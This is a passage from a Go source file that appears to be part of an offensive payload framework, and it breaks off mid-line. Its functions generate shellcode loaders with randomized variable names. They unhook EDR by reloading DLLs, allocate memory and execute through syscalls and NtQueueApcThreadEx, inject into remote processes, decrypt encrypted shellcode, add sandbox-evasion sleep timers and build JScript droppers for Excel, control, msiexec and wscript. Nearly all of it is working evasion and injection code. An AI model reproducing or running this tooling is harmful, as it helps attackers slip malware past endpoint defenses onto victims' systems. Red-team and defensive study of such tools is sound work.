19) 531 | Reload.Variables["loc"] = Cryptor.VarNumberLength(10, 19) 532 | Reload.Variables["mem"] = Cryptor.VarNumberLength(10, 19) 533 | Reload.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) 534 | Reload.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) 535 | Reload.Variables["x"] = Cryptor.VarNumberLength(10, 19) 536 | Reload.Variables["file"] = Cryptor.VarNumberLength(10, 19) 537 | Reload.Variables["ntPathW"] = Cryptor.VarNumberLength(10, 19) 538 | Reload.Variables["ntPath"] = Cryptor.VarNumberLength(10, 19) 539 | Reload.Variables["DLL"] = Cryptor.VarNumberLength(10, 19) 540 | Reload.Variables["objectAttributes"] = Cryptor.VarNumberLength(10, 19) 541 | Reload.Variables["KnownDll"] = Cryptor.VarNumberLength(10, 19) 542 | Reload.Variables["fullbytes"] = Cryptor.VarNumberLength(10, 19) 543 | Reload.Variables["rawdata"] = Cryptor.VarNumberLength(10, 19) 544 | Reload.Variables["CleanSystemDLL"] = Cryptor.VarNumberLength(10, 19) 545 | Reload.Variables["sztViewSize"] = Cryptor.VarNumberLength(10, 19) 546 | 547 | Reload.Variables["Address"] = Cryptor.VarNumberLength(10, 19) 548 | Reload.Variables["FindAddress"] = FindAddress 549 | Reload.Variables["NtOpenSection"] = Cryptor.VarNumberLength(10, 19) 550 | Reload.Variables["NtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) 551 | Reload.Variables["mxKeSFQASvbvx"] = Cryptor.VarNumberLength(10, 19) 552 | Reload.Variables["ttttt"] = Cryptor.VarNumberLength(10, 19) 553 | Reload.Variables["procNtOpenSection"] = Cryptor.VarNumberLength(10, 19) 554 | Reload.Variables["procNtMapViewOfSection"] = Cryptor.VarNumberLength(10, 19) 555 | Reload.Variables["procNtUnmapViewOfSection"] = Cryptor.VarNumberLength(10, 19) 556 | Reload.Variables["sstring"] = Cryptor.VarNumberLength(10, 19) 557 | Reload.Variables["KnownDLL"] = Cryptor.VarNumberLength(10, 19) 558 | Reload.Variables["WriteMemoryfunc"] = Cryptor.VarNumberLength(10, 19) 559 | Reload.Variables["index"] = Cryptor.VarNumberLength(10, 19) 560 | Reload.Variables["writePtr"] = Cryptor.VarNumberLength(10, 19) 561 | Reload.Variables["inbuf"] = Cryptor.VarNumberLength(10, 19) 562 | Reload.Variables["destination"] = Cryptor.VarNumberLength(10, 19) 563 | Reload.Variables["v"] = Cryptor.VarNumberLength(10, 19) 564 | Reload.Variables["xx"] = Cryptor.VarNumberLength(10, 19) 565 | Reload.Variables["handlee"] = Cryptor.VarNumberLength(10, 19) 566 | Reload.Variables["filee"] = Cryptor.VarNumberLength(10, 19) 567 | Reload.Variables["ddhandlez"] = Cryptor.VarNumberLength(10, 19) 568 | Reload.Variables["loaddlll"] = Cryptor.VarNumberLength(10, 19) 569 | 570 | if evasion == "KnownDLL" { 571 | if console == true { 572 | Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: C:\\\\Windows\\\\System32\\\\\"+" + Reload.Variables["DLL"] + "+\" \")" 573 | } else { 574 | Reload.Variables["ReloadingMessage"] = `` 575 | } 576 | ReloadTemplate, err := template.New("Reload").Parse(Struct.KnownDLL_Refresh()) 577 | 578 | if err != nil { 579 | log.Fatal(err) 580 | } 581 | 582 | if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { 583 | log.Fatal(err) 584 | } 585 | 586 | ReloadCode = buffer.String() 587 | } 588 | if evasion == "Disk" { 589 | if console == true { 590 | Reload.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Reload.Variables["DLLname"] + "[i]+\" \")" 591 | } else { 592 | Reload.Variables["ReloadingMessage"] = `` 593 | } 594 | ReloadTemplate, err := template.New("Reload").Parse(Struct.Disk_Refresh()) 595 | if err != nil { 596 | log.Fatal(err) 597 | } 598 | if err := ReloadTemplate.Execute(&buffer, Reload); err != nil { 599 | log.Fatal(err) 600 | } 601 | ReloadCode = buffer.String() 602 | } 603 | if evasion == "None" { 604 | Binary.Variables["Reloading"] = "" 605 | Reload.Variables["ReloadingMessage"] = "" 606 | ReloadCode = "" 607 | } 608 | 609 | Binary.Variables["ReloadFunction"] = ReloadCode 610 | buffer.Reset() 611 | 612 | if console == true { 613 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 614 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 615 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 616 | 617 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" 618 | Binary.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX section of the process\")" 619 | Binary.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying shellcode to memory with RtlCopyMemory\")" 620 | Binary.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling a custom syscall version of NtProtectVirtualMemory to change memory to not writeable\")" 621 | Binary.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a handle on the current process\")" 622 | Binary.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx to execute shellcode\")" 623 | Binary.Variables["SyscallMessage"] = "printDebug(\"[*] Calling shellcode using a System Call\")" 624 | 625 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Binary.Variables["Version"] + ")" 626 | Binary.Variables["PPIDMessage"] = 627 | `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) 628 | printDebug("[*] Creating Remote Process: " + strpid) 629 | printDebug("[*] Creating Handle to Remote Process")` 630 | Binary.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" 631 | Binary.Variables["addr"] = Cryptor.VarNumberLength(10, 19) 632 | Binary.Variables["RemoteModuleEnumeration"] = 633 | `` + Binary.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Binary.Variables["MI"] + `.LpBaseOfDll) 634 | printDebug("[+] " + ` + Binary.Variables["s"] + ` + "'s Base Address: " + ` + Binary.Variables["addr"] + `) 635 | printDebug("[*] Reloading " + ` + Binary.Variables["s"] + ` + "'s .Text Field")` 636 | Binary.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" 637 | Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" 638 | Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" 639 | Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")" 640 | } else { 641 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)" 642 | Binary.Variables["Debug"] = "" 643 | Binary.Variables["RefreshPE"] = "" 644 | Binary.Variables["EDR"] = "" 645 | Binary.Variables["ShellcodeString"] = "" 646 | Binary.Variables["Pointer"] = "" 647 | Binary.Variables["CopyPointer"] = "" 648 | Binary.Variables["OverwrittenShellcode"] = "" 649 | Binary.Variables["OverWrittenPoint"] = "" 650 | Binary.Variables["ReloadingMessage"] = "" 651 | Binary.Variables["VersionMessage"] = "" 652 | 653 | Binary.Variables["RemoteModuleEnumeration"] = "" 654 | Binary.Variables["PPIDMessage"] = "" 655 | Binary.Variables["ModuleMessage"] = "" 656 | Binary.Variables["RemoteModuleMessage"] = "" 657 | Binary.Variables["RemoteReloading"] = "" 658 | Binary.Variables["Injecting"] = "" 659 | Binary.Variables["Injected"] = "" 660 | 661 | Binary.Variables["AllocatingMessage"] = "" 662 | Binary.Variables["RtlCopyMemoryMessage"] = "" 663 | Binary.Variables["VirtualProtectMessage"] = "" 664 | Binary.Variables["GetCurrentThreadMessage"] = "" 665 | Binary.Variables["NtQueueApcThreadExMessage"] = "" 666 | Binary.Variables["SyscallMessage"] = "" 667 | 668 | } 669 | 670 | if Sleep == false { 671 | Binary.Variables["SleepSecond"] = strconv.Itoa(Cryptor.GenerateNumer(2220, 2900)) 672 | fmt.Println("[+] Sleep Timer set for " + Binary.Variables["SleepSecond"] + " milliseconds ") 673 | } else { 674 | Binary.Variables["SleepSecond"] = "0" 675 | } 676 | 677 | BinaryTemplate, err := template.New("Binary").Parse(Structure) 678 | if err != nil { 679 | log.Fatal(err) 680 | } 681 | if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { 682 | log.Fatal(err) 683 | } 684 | return buffer.String(), Binary.Variables["FuncName"], Binary.Variables["NTFuncName"] 685 | } 686 | 687 | func Shellcode_Loader_Buff(Exec_Type string, ProcessInjection string, customsyscall string, customsyscallVP string, PROCESS_ALL_ACCESS string, WriteProcessMemory string, console bool, FindAddress string, RemoteETWFunctionName string) (string, string, string) { 688 | var buffer bytes.Buffer 689 | var Structure string 690 | Shellcode_Loader := &Shellcode_Loader{} 691 | Shellcode_Loader.Variables = make(map[string]string) 692 | 693 | Shellcode_Loader.Variables["FunctionName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) 694 | Shellcode_Loader.Variables["customsyscall"] = customsyscall 695 | Shellcode_Loader.Variables["customsyscallVP"] = customsyscallVP 696 | 697 | //Syscall_RtlCopy 698 | Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9) 699 | Shellcode_Loader.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) 700 | Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) 701 | Shellcode_Loader.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) 702 | Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) 703 | Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) 704 | Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) 705 | Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) 706 | Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19) 707 | Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(4, 9) 708 | 709 | //Syscall_Alloc 710 | Shellcode_Loader.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) 711 | Shellcode_Loader.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) 712 | Shellcode_Loader.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) 713 | Shellcode_Loader.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) 714 | Shellcode_Loader.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) 715 | Shellcode_Loader.Variables["protect"] = Cryptor.VarNumberLength(10, 19) 716 | Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) 717 | Shellcode_Loader.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) 718 | Shellcode_Loader.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) 719 | Shellcode_Loader.Variables["buff"] = Cryptor.VarNumberLength(10, 19) 720 | 721 | //Syscall_RtlCopy 722 | Shellcode_Loader.Variables["kernel32"] = Cryptor.VarNumberLength(10, 19) 723 | Shellcode_Loader.Variables["ntdll"] = Cryptor.VarNumberLength(10, 19) 724 | Shellcode_Loader.Variables["VirtualAlloc"] = Cryptor.VarNumberLength(10, 19) 725 | Shellcode_Loader.Variables["RtlCopyMemory"] = Cryptor.VarNumberLength(10, 19) 726 | Shellcode_Loader.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) 727 | Shellcode_Loader.Variables["GetCurrentThread"] = Cryptor.VarNumberLength(10, 19) 728 | Shellcode_Loader.Variables["thread"] = Cryptor.VarNumberLength(10, 19) 729 | Shellcode_Loader.Variables["NtQueueApcThreadEx"] = Cryptor.VarNumberLength(10, 19) 730 | Shellcode_Loader.Variables["FindAddress"] = FindAddress 731 | 732 | //Process Injection 733 | Shellcode_Loader.Variables["RemoteETW"] = RemoteETWFunctionName 734 | Shellcode_Loader.Variables["file"] = Cryptor.VarNumberLength(10, 19) 735 | Shellcode_Loader.Variables["handle"] = Cryptor.VarNumberLength(10, 19) 736 | Shellcode_Loader.Variables["old"] = Cryptor.VarNumberLength(10, 19) 737 | Shellcode_Loader.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) 738 | Shellcode_Loader.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(10, 19) 739 | Shellcode_Loader.Variables["loader"] = Cryptor.VarNumberLength(10, 19) 740 | Shellcode_Loader.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) 741 | Shellcode_Loader.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) 742 | Shellcode_Loader.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) 743 | Shellcode_Loader.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) 744 | Shellcode_Loader.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) 745 | Shellcode_Loader.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) 746 | Shellcode_Loader.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) 747 | Shellcode_Loader.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) 748 | Shellcode_Loader.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) 749 | Shellcode_Loader.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) 750 | Shellcode_Loader.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) 751 | Shellcode_Loader.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) 752 | Shellcode_Loader.Variables["Target"] = Cryptor.VarNumberLength(10, 19) 753 | Shellcode_Loader.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) 754 | Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19) 755 | Shellcode_Loader.Variables["buf"] = Cryptor.VarNumberLength(10, 19) 756 | Shellcode_Loader.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) 757 | Shellcode_Loader.Variables["data"] = Cryptor.VarNumberLength(10, 19) 758 | Shellcode_Loader.Variables["err"] = Cryptor.VarNumberLength(10, 19) 759 | Shellcode_Loader.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) 760 | Shellcode_Loader.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) 761 | Shellcode_Loader.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) 762 | Shellcode_Loader.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) 763 | Shellcode_Loader.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) 764 | Shellcode_Loader.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) 765 | Shellcode_Loader.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) 766 | Shellcode_Loader.Variables["hh"] = Cryptor.VarNumberLength(10, 19) 767 | Shellcode_Loader.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) 768 | Shellcode_Loader.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19) 769 | Shellcode_Loader.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) 770 | Shellcode_Loader.Variables["mi"] = Cryptor.VarNumberLength(10, 19) 771 | Shellcode_Loader.Variables["mod"] = Cryptor.VarNumberLength(10, 19) 772 | Shellcode_Loader.Variables["modules"] = Cryptor.VarNumberLength(10, 19) 773 | Shellcode_Loader.Variables["module"] = Cryptor.VarNumberLength(10, 19) 774 | Shellcode_Loader.Variables["nLength"] = Cryptor.VarNumberLength(10, 19) 775 | Shellcode_Loader.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) 776 | Shellcode_Loader.Variables["name"] = Cryptor.VarNumberLength(10, 19) 777 | Shellcode_Loader.Variables["needed"] = Cryptor.VarNumberLength(10, 19) 778 | Shellcode_Loader.Variables["n"] = Cryptor.VarNumberLength(10, 19) 779 | Shellcode_Loader.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) 780 | Shellcode_Loader.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) 781 | Shellcode_Loader.Variables["outString"] = Cryptor.VarNumberLength(10, 19) 782 | Shellcode_Loader.Variables["pi"] = Cryptor.VarNumberLength(10, 19) 783 | Shellcode_Loader.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) 784 | Shellcode_Loader.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) 785 | Shellcode_Loader.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) 786 | Shellcode_Loader.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) 787 | Shellcode_Loader.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) 788 | Shellcode_Loader.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) 789 | Shellcode_Loader.Variables["process"] = Cryptor.VarNumberLength(10, 19) 790 | Shellcode_Loader.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) 791 | Shellcode_Loader.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) 792 | Shellcode_Loader.Variables["s"] = Cryptor.VarNumberLength(10, 19) 793 | Shellcode_Loader.Variables["si"] = Cryptor.VarNumberLength(10, 19) 794 | Shellcode_Loader.Variables["size"] = Cryptor.VarNumberLength(10, 19) 795 | Shellcode_Loader.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) 796 | Shellcode_Loader.Variables["dll"] = Cryptor.VarNumberLength(10, 19) 797 | Shellcode_Loader.Variables["error"] = Cryptor.VarNumberLength(10, 19) 798 | Shellcode_Loader.Variables["x"] = Cryptor.VarNumberLength(10, 19) 799 | Shellcode_Loader.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) 800 | Shellcode_Loader.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) 801 | Shellcode_Loader.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) 802 | Shellcode_Loader.Variables["PROCESS_ALL_ACCESS"] = PROCESS_ALL_ACCESS 803 | Shellcode_Loader.Variables["WriteProcessMemory"] = WriteProcessMemory 804 | Shellcode_Loader.Variables["MI"] = Cryptor.VarNumberLength(4, 9) 805 | 806 | if console == true { 807 | 808 | Shellcode_Loader.Variables["AllocatingMessage"] = "printDebug(\"[+] Allocating a RWX Section of the Process\")" 809 | Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "printDebug(\"[+] Copying Shellcode to Memory with RtlCopyMemory\")" 810 | Shellcode_Loader.Variables["VirtualProtectMessage"] = "printDebug(\"[+] Calling VirtualProtect to Change Memory to not Writeable\")" 811 | Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "printDebug(\"[+] Calling GetCurrentThread to get a Handle on the Current Process\")" 812 | Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "printDebug(\"[+] Calling NtQueueApcThreadEx API to Execute Shellcode\")" 813 | Shellcode_Loader.Variables["SyscallMessage"] = "printDebug(\"[*] Calling the Shellcode Using a Syscall\")" 814 | Shellcode_Loader.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+" + Shellcode_Loader.Variables["DLLname"] + "+\" \")" 815 | Shellcode_Loader.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + Shellcode_Loader.Variables["Version"] + ")" 816 | Shellcode_Loader.Variables["PPIDMessage"] = 817 | `strpid := fmt.Sprint(` + Shellcode_Loader.Variables["pi"] + `.ProcessId) 818 | printDebug("[*] Creating Remote Process: " + strpid) 819 | printDebug("[*] Creating Handle to Remote Process")` 820 | Shellcode_Loader.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" 821 | Shellcode_Loader.Variables["addr"] = Cryptor.VarNumberLength(10, 19) 822 | Shellcode_Loader.Variables["RemoteModuleEnumeration"] = 823 | `` + Shellcode_Loader.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Shellcode_Loader.Variables["MI"] + `.LpBaseOfDll) 824 | printDebug("[+] " + ` + Shellcode_Loader.Variables["s"] + ` + "'s Base Address: " + ` + Shellcode_Loader.Variables["addr"] + `) 825 | printDebug("[*] Reloading " + ` + Shellcode_Loader.Variables["s"] + ` + "'s .Text Field")` 826 | Shellcode_Loader.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" 827 | Shellcode_Loader.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" 828 | Shellcode_Loader.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" 829 | Shellcode_Loader.Variables["Injected"] = "printDebug(\"[+] Injected!\")" 830 | } else { 831 | Shellcode_Loader.Variables["RemoteModuleEnumeration"] = "" 832 | Shellcode_Loader.Variables["PPIDMessage"] = "" 833 | Shellcode_Loader.Variables["ModuleMessage"] = "" 834 | Shellcode_Loader.Variables["RemoteModuleMessage"] = "" 835 | Shellcode_Loader.Variables["RemoteReloading"] = "" 836 | Shellcode_Loader.Variables["Injecting"] = "" 837 | Shellcode_Loader.Variables["Injected"] = "" 838 | 839 | Shellcode_Loader.Variables["AllocatingMessage"] = "" 840 | Shellcode_Loader.Variables["RtlCopyMemoryMessage"] = "" 841 | Shellcode_Loader.Variables["VirtualProtectMessage"] = "" 842 | Shellcode_Loader.Variables["GetCurrentThreadMessage"] = "" 843 | Shellcode_Loader.Variables["NtQueueApcThreadExMessage"] = "" 844 | Shellcode_Loader.Variables["SyscallMessage"] = "" 845 | 846 | } 847 | if ProcessInjection != "" { 848 | ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) 849 | Shellcode_Loader.Variables["processpath"] = ProcessInjection 850 | 851 | Shellcode_Loader.Variables["offset"] = Cryptor.VarNumberLength(4, 9) 852 | Shellcode_Loader.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) 853 | Structure = Struct.Procces_Injection() 854 | } 855 | if Exec_Type == "VirtualAlloc" { 856 | Structure = Struct.Syscall_Alloc() 857 | } 858 | if Exec_Type == "RtlCopy" { 859 | Structure = Struct.Syscall_RtlCopy() 860 | } 861 | if Exec_Type == "NtQueueApcThreadEx" { 862 | Structure = Struct.Syscall_NtQueueAPCThreadEx_Local() 863 | } 864 | Shellcode_LoaderTemplate, err := template.New("Shellcode_Loader").Parse(Structure) 865 | if err != nil { 866 | log.Fatal(err) 867 | } 868 | if err := Shellcode_LoaderTemplate.Execute(&buffer, Shellcode_Loader); err != nil { 869 | log.Fatal(err) 870 | } 871 | return buffer.String(), Shellcode_Loader.Variables["FunctionName"], Shellcode_Loader.Variables["raw_bin"] 872 | 873 | } 874 | func Shellcode_Buff(b64ciphertext string, b64key string, b64iv string, FuncName string, NTFuncName string, encryptionmode string) { 875 | var buffer bytes.Buffer 876 | Shellcode := &Shellcode{} 877 | Shellcode.Variables = make(map[string]string) 878 | var Structure string 879 | buffer.Reset() 880 | Shellcode.Variables["FuncName"] = FuncName 881 | Shellcode.Variables["fullciphertext"] = Cryptor.VarNumberLength(10, 19) 882 | Shellcode.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, Shellcode.Variables["fullciphertext"], true) 883 | Shellcode.Variables["key"] = b64key 884 | Shellcode.Variables["iv"] = b64iv 885 | Shellcode.Variables["vkey"] = Cryptor.VarNumberLength(10, 19) 886 | Shellcode.Variables["viv"] = Cryptor.VarNumberLength(10, 19) 887 | Shellcode.Variables["block"] = Cryptor.VarNumberLength(10, 19) 888 | Shellcode.Variables["decrypted"] = Cryptor.VarNumberLength(10, 19) 889 | Shellcode.Variables["mode"] = Cryptor.VarNumberLength(10, 19) 890 | Shellcode.Variables["vciphertext"] = Cryptor.VarNumberLength(10, 19) 891 | Shellcode.Variables["rawdata"] = Cryptor.VarNumberLength(10, 19) 892 | Shellcode.Variables["stuff"] = Cryptor.VarNumberLength(10, 19) 893 | Shellcode.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) 894 | Shellcode.Variables["hexdata"] = Cryptor.VarNumberLength(10, 19) 895 | Shellcode.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(10, 19) 896 | Shellcode.Variables["length"] = Cryptor.VarNumberLength(10, 19) 897 | Shellcode.Variables["src"] = Cryptor.VarNumberLength(10, 19) 898 | Shellcode.Variables["unpadding"] = Cryptor.VarNumberLength(10, 19) 899 | 900 | Shellcode.Variables["buff"] = Cryptor.VarNumberLength(10, 19) 901 | Shellcode.Variables["buff2"] = Cryptor.VarNumberLength(10, 19) 902 | Shellcode.Variables["clear"] = Cryptor.VarNumberLength(10, 19) 903 | Shellcode.Variables["err"] = Cryptor.VarNumberLength(10, 19) 904 | 905 | Shellcode.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) 906 | Shellcode.Variables["processHandle"] = Cryptor.VarNumberLength(10, 19) 907 | Shellcode.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) 908 | Shellcode.Variables["regionSize"] = Cryptor.VarNumberLength(10, 19) 909 | Shellcode.Variables["NewProtect"] = Cryptor.VarNumberLength(10, 19) 910 | Shellcode.Variables["oldprotect"] = Cryptor.VarNumberLength(10, 19) 911 | Shellcode.Variables["NtProtectVirtualMemoryprep"] = NTFuncName 912 | 913 | if encryptionmode == "ELZMA" { 914 | Structure = Struct.ELZMADecrypt_Function() 915 | } 916 | if encryptionmode == "AES" { 917 | Structure = Struct.AESDecrypt_Function() 918 | } 919 | if encryptionmode == "RC4" { 920 | Structure = Struct.RCFDecrypt_Function() 921 | } 922 | 923 | ShellcodeTemplate, err := template.New("Shellcode").Parse(Structure) 924 | if err != nil { 925 | log.Fatal(err) 926 | } 927 | buffer.Reset() 928 | if err := ShellcodeTemplate.Execute(&buffer, Shellcode); err != nil { 929 | log.Fatal(err) 930 | } 931 | Utils.PackageEditor("loader/loader.go", "Shellcodefunc", buffer.String()) 932 | 933 | } 934 | 935 | func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool, CommandLoader string) (string, string, string, string) { 936 | var LoaderTemplate string 937 | var buffer bytes.Buffer 938 | JScriptLoader := &JScriptLoader{} 939 | JScriptLoader.Variables = make(map[string]string) 940 | JScriptLoader.Variables["fso"] = Cryptor.VarNumberLength(10, 19) 941 | JScriptLoader.Variables["dropPath"] = Cryptor.VarNumberLength(10, 19) 942 | JScriptLoader.Variables["value"] = Cryptor.VarNumberLength(10, 19) 943 | JScriptLoader.Variables["strRegPath"] = Cryptor.VarNumberLength(10, 19) 944 | JScriptLoader.Variables["WshShell"] = Cryptor.VarNumberLength(10, 19) 945 | JScriptLoader.Variables["objShell"] = Cryptor.VarNumberLength(10, 19) 946 | if mode == "excel" { 947 | JScriptLoader.Variables["ApplicationName"] = "excel.exe" 948 | JScriptLoader.Variables["RegName"] = "Excel" 949 | JScriptLoader.Variables["dllext"] = ".xll" 950 | JScriptLoader.Variables["objapp"] = Cryptor.VarNumberLength(10, 19) 951 | JScriptLoader.Variables["Application_Version"] = Cryptor.VarNumberLength(10, 19) 952 | JScriptLoader.Variables["FileName"] = name 953 | JScriptLoader.Variables["filename"] = filename 954 | LoaderTemplate = Struct.JS_Office_Sub() 955 | } 956 | if mode == "control" { 957 | LoaderTemplate = Struct.JS_Control_Sub() 958 | JScriptLoader.Variables["dllext"] = ".cpl" 959 | JScriptLoader.Variables["filename"] = filename 960 | JScriptLoader.Variables["FileName"] = name 961 | } 962 | if mode == "msiexec" { 963 | LoaderTemplate = Struct.JS_Msiexec_Sub() 964 | JScriptLoader.Variables["dllext"] = ".dll" 965 | JScriptLoader.Variables["filename"] = filename 966 | JScriptLoader.Variables["FileName"] = name 967 | if CommandLoader == "hta" { 968 | JScriptLoader.Variables["System32"] = "Sysnative" 969 | } else { 970 | JScriptLoader.Variables["System32"] = "System32" 971 | } 972 | } 973 | if mode == "wscript" { 974 | JScriptLoader.Variables["dllext"] = "." + Cryptor.VarNumberLength(10, 19) 975 | JScriptLoader.Variables["FileName"] = name 976 | JScriptLoader.Variables["DLLName"] = name 977 | JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(10, 19) 978 | JScriptLoader.Variables["ax"] = Cryptor.VarNumberLength(10, 19) 979 | JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(10, 19) 980 | JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(10, 19) 981 | JScriptLoader.Variables["filename"] = name 982 | 983 | LoaderTemplate = Struct.WS_JS() 984 | } 985 | buffer.Reset() 986 | JSLoaderTemplate, err := template.New("JScriptLoader").Parse(LoaderTemplate) 987 | if err != nil { 988 | log.Fatal(err) 989 | } 990 | buffer.Reset() 991 | if err = JSLoaderTemplate.Execute(&buffer, JScriptLoader); err != nil { 992 | log.Fatal(err) 993 | } 994 | 995 | return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"], JScriptLoader.Variables["dllext"] 996 | 997 | } 998 | 999 | func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool, wsextension string) string { 1000 | var buffer bytes.Buffer 1001 | JScript := &JScript{} 1002 | SandboxJScript := &SandboxJScript{} 1003 | JScript.Variables = make(map[string]string) 1004 | SandboxJScript.Variables = make(map[string]string) 1005 | JScript.Variables["DLLName"] = Cryptor.VarNumberLength(10, 19) 1006 | JScript.Variables["fso"] = fso 1007 | JScript.Variables["dropPath"] = dropPath 1008 | JScript.Variables["Base64"] = Cryptor.VarNumberLength(10, 19) 1009 | JScript.Variables["base6411"] = Cryptor.VarNumberLength(10, 19) 1010 | JScript.Variables["rtest"] = Cryptor.VarNumberLength(10, 19) 1011 | JScript.Variables["atest"] = Cryptor.VarNumberLength(10, 19) 1012 | JScript.Variables["ctest"] = Cryptor.VarNumberLength(10, 19) 1013 | JScript.Variables["ttest"] = Cryptor.VarNumberLength(10, 19) 1014 | JScript.Variables["etest"] = 